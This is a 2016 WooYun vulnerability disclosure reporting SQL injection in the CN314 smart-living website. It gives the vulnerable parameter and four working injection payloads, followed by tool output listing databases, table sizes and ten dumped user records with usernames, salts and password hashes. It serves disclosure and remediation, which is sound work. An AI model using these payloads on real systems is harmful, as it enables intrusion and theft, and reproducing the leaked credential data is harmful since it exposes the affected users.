漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0167908
漏洞标题:中国派CN314智能生活网全网数据沦陷#25w用户+多个分站数据
相关厂商:北京林格纵横网络科技有限公司
漏洞作者: 路人甲
提交时间:2016-01-08 16:02
修复时间:2016-02-22 16:48
公开时间:2016-02-22 16:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开
2016-02-22: 细节向公众公开
简要描述:
RT
详细说明:
http://**.**.**.**/skin/pai/extend/tushangshangxiapian.php?shangxia=shang&classid=486&id=116172 (GET)
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: shangxia=shang&classid=486&id=116172 AND 7393=7393
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: shangxia=shang&classid=486&id=116172 AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x7171776871,(SELECT (CASE WHEN (1368=1368) THEN 1 ELSE 0 END)),0x716c767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: shangxia=shang&classid=486&id=-4500 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171776871,0x76425756787052676868,0x716c767871)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: shangxia=shang&classid=486&id=116172 AND SLEEP(5)
---
web application technology: Apache 2.2.22, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [13]:
[*] chinapader
[*] chinapaderuc
[*] chinapaderwww
[*] cn314bbs
[*] cn314bbs_bak
[*] cn314beifen1
[*] cn314beifen2
[*] cn314www
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] www_new
web application technology: Apache 2.2.22, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: chinapaderuc
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| uc_members | 257670 |
| uc_memberfields | 257669 |
| uc_pm_indexes | 7272 |
| uc_notelist | 5351 |
| uc_pm_members | 5251 |
| uc_pm_lists | 2811 |
| uc_tags | 944 |
| uc_pm_messages_6 | 840 |
| uc_pm_messages_5 | 783 |
| uc_pm_messages_9 | 780 |
| uc_pm_messages_1 | 776 |
| uc_pm_messages_4 | 730 |
| uc_pm_messages_3 | 721 |
| uc_pm_messages_2 | 692 |
| uc_pm_messages_0 | 683 |
| uc_pm_messages_7 | 652 |
| uc_pm_messages_8 | 613 |
| uc_newpm | 552 |
| uc_pms | 472 |
| uc_friends | 142 |
| uc_settings | 28 |
| uc_applications | 2 |
| uc_protectedmembers | 2 |
| uc_failedlogins | 1 |
+---------------------+---------+
Database: chinapaderuc
Table: uc_members
[10 entries]
+-----+---------+---------+--------+----------------+-------------------------+---------+------------+-------------+----------------------------------+-------------+---------------+
| uid | myid | myidkey | salt | regip | email | secques | regdate | username | password | lastloginip | lastlogintime |
+-----+---------+---------+--------+----------------+-------------------------+---------+------------+-------------+----------------------------------+-------------+---------------+
| 1 | <blank> | <blank> | fb3455 | **.**.**.** | huang_yue@**.**.**.** | <blank> | 1258541567 | admin | 0ce64594c899fb65b9d62eec8beeb50e | 0 | 0 |
| 2 | <blank> | <blank> | c18280 | **.**.**.** | fannxxxx@**.**.**.** | <blank> | 1258546492 | fanchengfei | 581486b403cc5bd11429ca61e9144440 | 0 | 0 |
| 3 | <blank> | <blank> | 0c9fc3 | **.**.**.** | dpmag_fan@**.**.**.** | <blank> | 1258546544 | 年轻胶片摄影师 | 8108847756a03a50f43f25078c51177d | 0 | 0 |
| 4 | <blank> | <blank> | 76bda8 | **.**.**.** | fan_chengfei@**.**.**.** | <blank> | 1258546759 | 老范 | ee44d095d7b572c4ec872bd2f84bdb4d | 0 | 0 |
| 5 | <blank> | <blank> | c134c4 | **.**.**.** | fuluhada@**.**.**.** | <blank> | 1258547036 | 老罗 | 519bfd7cca6e743392dac65f51e152c4 | 0 | 0 |
| 6 | <blank> | <blank> | beaba6 | **.**.**.** | 749247439@**.**.**.** | <blank> | 1258547147 | 鸿钧老祖 | 642273f821e3b0621e25d640fdd5708a | 0 | 0 |
| 7 | <blank> | <blank> | 26c729 | **.**.**.** | 119507@**.**.**.** | <blank> | 1258547938 | 市井小生 | 05c1ff9d1bbfe6d445f575ea7c01c24f | 0 | 0 |
| 8 | <blank> | <blank> | 98f2eb | **.**.**.** | tnt119@**.**.**.** | <blank> | 1258547977 | 数码英雄 | 76caf975e1a872f608a70da90d5b393d | 0 | 0 |
| 9 | <blank> | <blank> | d6ae46 | **.**.**.** | 405901422@**.**.**.** | <blank> | 1258548893 | jk刘 | 5409c4e2c70d985c9e9f529a78fe1dde | 0 | 0 |
| 10 | <blank> | <blank> | 00df59 | **.**.**.** | 405901422@**.**.**.** | <blank> | 1258548944 | ljk4160 | 1522d1b8fcab2b8349120b185f5a0cc8 | 0 | 0 |
+-----+---------+---------+--------+----------------+-------------------------+---------+------------+-------------+----------------------------------+-------------+---------------+
修复方案:
参数过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2016-01-12 15:53
厂商回复:
CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。
最新状态:
暂无